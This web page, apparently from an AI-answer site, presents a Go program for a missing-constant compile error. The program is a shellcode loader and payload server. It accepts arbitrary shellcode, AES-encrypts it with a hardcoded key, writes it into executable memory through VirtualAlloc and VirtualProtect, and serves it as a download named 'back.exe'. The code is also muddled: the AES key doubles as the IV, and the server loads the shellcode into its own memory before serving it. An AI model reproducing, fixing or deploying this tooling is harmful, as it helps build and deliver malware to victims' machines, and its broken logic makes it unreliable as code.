Go 编译错误解决:undefined: PAGE_EXECUTE_READ
package main
import ( "bytes" "crypto/aes" "crypto/cipher" "encoding/base64" "fmt" "log" "net/http" "syscall" "unsafe" "io" )
var ( kernel32 = syscall.NewLazyDLL("kernel32.dll") virtualAlloc = kernel32.NewProc("VirtualAlloc") virtualProtect = kernel32.NewProc("VirtualProtect") rtlMoveMemory = kernel32.NewProc("RtlMoveMemory") ntFlushInstructionCache = kernel32.NewProc("NtFlushInstructionCache") )
const ( PAGE_EXECUTE_READWRITE = 0x40 MEM_COMMIT = 0x1000 MEM_RESERVE = 0x2000 PAGE_EXECUTE_READ = 0x20 // Add missing constant )
func main() { http.HandleFunc("/", handleShellcode) http.HandleFunc("/download", handleDownload) http.ListenAndServe(":8080", nil) }
func handleShellcode(w http.ResponseWriter, r *http.Request) { if r.Method != http.MethodPost { http.Error(w, "Method not allowed", http.StatusMethodNotAllowed) return } shellcode, err := io.ReadAll(r.Body) if err != nil { log.Println(err) http.Error(w, "Internal server error", http.StatusInternalServerError) return } encryptedShellcode, err := encryptShellcode(shellcode) if err != nil { log.Println(err) http.Error(w, "Internal server error", http.StatusInternalServerError) return } payload := generatePayload(encryptedShellcode) w.Write(payload) }
func handleDownload(w http.ResponseWriter, r *http.Request) { w.Header().Set("Content-Disposition", "attachment; filename=back.exe") w.Header().Set("Content-Type", "application/octet-stream") shellcode, err := base64.StdEncoding.DecodeString(r.URL.Query().Get("shellcode")) if err != nil { log.Println(err) http.Error(w, "Internal server error", http.StatusInternalServerError) return } encryptedShellcode, err := encryptShellcode(shellcode) if err != nil { log.Println(err) http.Error(w, "Internal server error", http.StatusInternalServerError) return } payload := generatePayload(encryptedShellcode) w.Write(payload) }
func encryptShellcode(shellcode []byte) ([]byte, error) { key := []byte("0123456789abcdef") block, err := aes.NewCipher(key) if err != nil { return nil, err } paddedShellcode := PKCS5Padding(shellcode, block.BlockSize()) mode := cipher.NewCBCEncrypter(block, key) encryptedShellcode := make([]byte, len(paddedShellcode)) mode.CryptBlocks(encryptedShellcode, paddedShellcode) return encryptedShellcode, nil }
func PKCS5Padding(src []byte, blockSize int) []byte { padding := blockSize - len(src)%blockSize padtext := bytes.Repeat([]byte{byte(padding)}, padding) return append(src, padtext...) }
func generatePayload(shellcode []byte) []byte { baseAddr, _, _ := virtualAlloc.Call(0, uintptr(len(shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE) if baseAddr == 0 { log.Fatal("VirtualAlloc failed") } _, _, _ = rtlMoveMemory.Call(baseAddr, (uintptr)(unsafe.Pointer(&shellcode[0])), uintptr(len(shellcode))) var oldProtect uintptr _, _, _ = virtualProtect.Call(baseAddr, uintptr(len(shellcode)), PAGE_EXECUTE_READ, uintptr(unsafe.Pointer(&oldProtect))) _, _, _ = ntFlushInstructionCache.Call(0, baseAddr, uintptr(len(shellcode))) return []byte(fmt.Sprintf("Content-Type: application/octet-stream\r\nContent-Disposition: attachment; filename='back.exe'\r\n\r\n%s", base64.StdEncoding.EncodeToString(shellcode)))
原文地址: https://www.cveoy.top/t/topic/lNc1 著作权归作者所有。请勿转载和采集!